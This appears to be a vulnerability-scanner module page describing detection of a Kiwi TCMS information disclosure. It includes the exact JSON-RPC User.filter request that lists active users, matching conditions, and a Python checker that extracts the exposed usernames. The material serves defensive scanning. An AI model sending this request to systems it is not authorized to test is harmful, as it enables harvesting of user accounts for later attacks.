Kiwi TCMS Information Disclosure

By kannthu

High
Vidoc Module
#kiwitcms #exposure #misconfig #hackerone
Description

What is "Kiwi TCMS Information Disclosure"?

The "Kiwi TCMS Information Disclosure" module is designed to detect a specific vulnerability in the Kiwi TCMS software. This vulnerability allows for the exposure of sensitive information due to a misconfiguration. The severity of this vulnerability is classified as high.

Impact

If exploited, the "Kiwi TCMS Information Disclosure" vulnerability can result in the unauthorized disclosure of sensitive information. This can include usernames, as well as other data related to active users of the Kiwi TCMS software.

How does the module work?

The "Kiwi TCMS Information Disclosure" module works by sending a specific HTTP request to the target system. The request is designed to exploit the misconfiguration in the Kiwi TCMS software and retrieve sensitive information. The module uses the following matching conditions to determine if the vulnerability is present:

- The HTTP response status must be 200.
- The response body must contain the words "result", "username", "jsonrpc", and "is_active".

By analyzing the response based on these conditions, the module can determine if the vulnerability exists and report it accordingly.

Example HTTP request:

POST /json-rpc/ HTTP/1.1
Host: <Hostname>
Content-Type: application/json
Accept-Encoding: gzip, deflate

{
  "jsonrpc": "2.0",
  "method": "User.filter",
  "id": 1,
  "params": {
    "query": {
      "is_active": true
    }
  }
}

It is important to note that this module is specifically designed to detect the "Kiwi TCMS Information Disclosure" vulnerability and may not be applicable to other software or systems.
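The matching conditions above, written out as an added example (this is not Vidoc's module code). It applies the status and word checks to a response and then, as a stricter follow-up for triage, parses the JSON-RPC reply to confirm that user records were actually returned. The sample responses, the function names and the error reply are assumptions constructed for illustration.

```python
import json

# Words the module's matcher looks for in the response body (from the page).
MATCH_WORDS = ("result", "username", "jsonrpc", "is_active")


def module_match(status: int, body: str) -> bool:
    """The page's conditions: status 200 AND every word present in the body."""
    return status == 200 and all(word in body for word in MATCH_WORDS)


def exposed_usernames(status: int, body: str) -> list[str]:
    """Stricter check: parse the JSON-RPC 2.0 reply and return the usernames
    it actually discloses. An empty list means no user records came back."""
    if status != 200:
        return []
    try:
        reply = json.loads(body)
    except ValueError:
        return []
    if not isinstance(reply, dict) or reply.get("jsonrpc") != "2.0":
        return []
    result = reply.get("result")
    if not isinstance(result, list):  # error replies carry "error", not a list
        return []
    return [
        row["username"]
        for row in result
        if isinstance(row, dict)
        and isinstance(row.get("username"), str)
        and "is_active" in row
    ]


# Constructed sample responses (not captured from a real server).
DISCLOSING = json.dumps({
    "jsonrpc": "2.0", "id": 1,
    "result": [{"username": "alice", "is_active": True},
               {"username": "bob", "is_active": True}],
})
# Constructed denied call whose error text happens to echo all four words.
DENIED = json.dumps({
    "jsonrpc": "2.0", "id": 1,
    "error": {"code": -32603,
              "message": "Denied: no result for username query is_active"},
})

if __name__ == "__main__":
    for name, body in (("disclosing", DISCLOSING), ("denied", DENIED)):
        print(name, module_match(200, body), exposed_usernames(200, body))
```

The second sample shows why a word match alone is worth confirming before a finding is escalated: it satisfies the module's conditions while returning no user data.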

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
status: 200 and
word: result, username, jsonrpc, is_active
Passive global matcher
No matching conditions.
On match action
Report vulnerability